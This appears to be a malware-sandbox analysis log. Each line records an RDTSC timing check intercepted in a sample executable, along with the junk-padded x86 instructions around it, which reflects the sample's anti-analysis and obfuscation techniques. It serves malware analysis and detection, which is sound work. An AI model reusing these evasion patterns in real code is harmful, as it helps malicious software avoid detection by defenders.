Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33AD16 second address: 33AD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33AE65 second address: 33AE6B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33AE6B second address: 33AE78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F9B30E293B6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33AE78 second address: 33AE80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33AE80 second address: 33AE86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33B016 second address: 33B01A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33F83C second address: 33F846 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9B30E293B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33F846 second address: 33F84C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33F9D0 second address: 33F9D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33FB3C second address: 33FB43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33FB43 second address: 33FB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33FF2F second address: 33FF77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829933h 0x00000007 push ebx 0x00000008 jmp 00007F9B30829937h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F9B3082992Ah 0x0000001c jnc 00007F9B30829926h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33FF77 second address: 33FF8D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F9B30E293B6h 0x00000010 jbe 00007F9B30E293B6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3400FC second address: 340102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 340102 second address: 340119 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edi 0x0000000d push ebx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 340119 second address: 34011F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 34038D second address: 340393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 340393 second address: 340397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 340397 second address: 34039F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 34039F second address: 3403A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 34050A second address: 34050E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 34050E second address: 340514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 340677 second address: 3406AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9B30E293C6h 0x0000000d ja 00007F9B30E293C7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3406AC second address: 3406B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3406B2 second address: 3406B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 340B30 second address: 340B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33F40D second address: 33F417 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33F417 second address: 33F41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33F41D second address: 33F421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3463B4 second address: 3463B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30B6E6 second address: 2F24E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F9B30E293B8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dh, A1h 0x00000026 call dword ptr [ebp+122D2AF2h] 0x0000002c pushad 0x0000002d jnc 00007F9B30E293C2h 0x00000033 jmp 00007F9B30E293C5h 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30BCB5 second address: 30BCD8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9B3082992Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c jl 00007F9B30829928h 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30BCD8 second address: 30BCF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F9B30E293BBh 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 js 00007F9B30E293BEh 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30BCF8 second address: 30BD14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 movzx edx, dx 0x00000009 push F2AF9B6Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F9B3082992Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30BD72 second address: 30BD76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30BD76 second address: 30BD7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30BDCA second address: 30BDCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30BDCE second address: 30BE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jl 00007F9B3082992Eh 0x0000000e xchg eax, esi 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F9B30829928h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 stc 0x0000002a nop 0x0000002b pushad 0x0000002c push edx 0x0000002d jmp 00007F9B3082992Fh 0x00000032 pop edx 0x00000033 push ebx 0x00000034 je 00007F9B30829926h 0x0000003a pop ebx 0x0000003b popad 0x0000003c push eax 0x0000003d pushad 0x0000003e push edx 0x0000003f jnc 00007F9B30829926h 0x00000045 pop edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jng 00007F9B30829926h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30C191 second address: 30C1AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9B30E293C1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30C1AC second address: 30C1B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30C5C2 second address: 30C5CC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9B30E293B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30C5CC second address: 30C5F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2ACBh], edx 0x00000011 push 0000001Eh 0x00000013 mov dword ptr [ebp+122D1E54h], ebx 0x00000019 nop 0x0000001a ja 00007F9B30829930h 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30C5F1 second address: 30C60A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F9B30E293C1h 0x0000000e jmp 00007F9B30E293BBh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30C60A second address: 30C60F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 321F58 second address: 321F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 322F85 second address: 322F99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829930h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3230AE second address: 3230B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3230B3 second address: 3230B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 328455 second address: 32845A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3292C5 second address: 329384 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9B30829926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp], eax 0x0000000e js 00007F9B3082992Ch 0x00000014 mov edi, dword ptr [ebp+122D2D6Ah] 0x0000001a push dword ptr fs:[00000000h] 0x00000021 push esi 0x00000022 sub dword ptr [ebp+124901EFh], ecx 0x00000028 pop ebx 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 mov ebx, dword ptr [ebp+122D25A8h] 0x00000036 mov eax, dword ptr [ebp+122D0875h] 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007F9B30829928h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 push FFFFFFFFh 0x00000058 jno 00007F9B30829929h 0x0000005e sub bx, B027h 0x00000063 nop 0x00000064 pushad 0x00000065 jmp 00007F9B3082992Fh 0x0000006a pushad 0x0000006b jmp 00007F9B30829939h 0x00000070 pushad 0x00000071 popad 0x00000072 popad 0x00000073 popad 0x00000074 push eax 0x00000075 pushad 0x00000076 jnl 00007F9B30829936h 0x0000007c push eax 0x0000007d push edx 0x0000007e jnp 00007F9B30829926h 0x00000084 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30C93D second address: 30C941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30C941 second address: 30C97D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 jc 00007F9B30829926h 0x00000018 popad 0x00000019 jnc 00007F9B3082992Ch 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 push ebx 0x00000023 jbe 00007F9B30829928h 0x00000029 push edi 0x0000002a pop edi 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push ecx 0x00000033 push edx 0x00000034 pop edx 0x00000035 pop ecx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30C97D second address: 30C983 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30C983 second address: 30C987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30B6C5 second address: 30B6E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007F9B30E293B6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 345837 second address: 34583D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 345C6C second address: 345C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 345C73 second address: 345CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9B30829935h 0x00000009 jmp 00007F9B30829932h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3490D4 second address: 3490DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3490DD second address: 3490E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3490E3 second address: 3490E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3490E7 second address: 3490F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9B30829926h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3490F3 second address: 349118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9B30E293BEh 0x00000008 jno 00007F9B30E293B6h 0x0000000e jp 00007F9B30E293B6h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 349118 second address: 34911C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 34DBCE second address: 34DBE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9B30E293BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3551C5 second address: 3551CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3551CD second address: 3551D7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9B30E293B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3551D7 second address: 3551E7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9B30829932h 0x00000008 jnl 00007F9B30829926h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3551E7 second address: 3551F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 355449 second address: 35544E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 357D09 second address: 357D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9B30E293BAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F9B30E293B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 357D20 second address: 357D24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 35790A second address: 357912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 357912 second address: 357918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 35E3DB second address: 35E3DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 35D028 second address: 35D02E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2C58FC second address: 2C5900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 363057 second address: 36305C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3623B3 second address: 3623BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 36267C second address: 362685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 362685 second address: 36268F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F9B30E293B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 362819 second address: 36284E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829938h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F9B30829939h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 36284E second address: 362863 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9B30E293B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F9B30E293B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 362863 second address: 362887 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9B3082992Eh 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jo 00007F9B30829926h 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 362887 second address: 36288B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2D4C5D second address: 2D4C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2D4C63 second address: 2D4C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 36590A second address: 36593B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jmp 00007F9B30829933h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9B30829930h 0x00000018 rdtsc
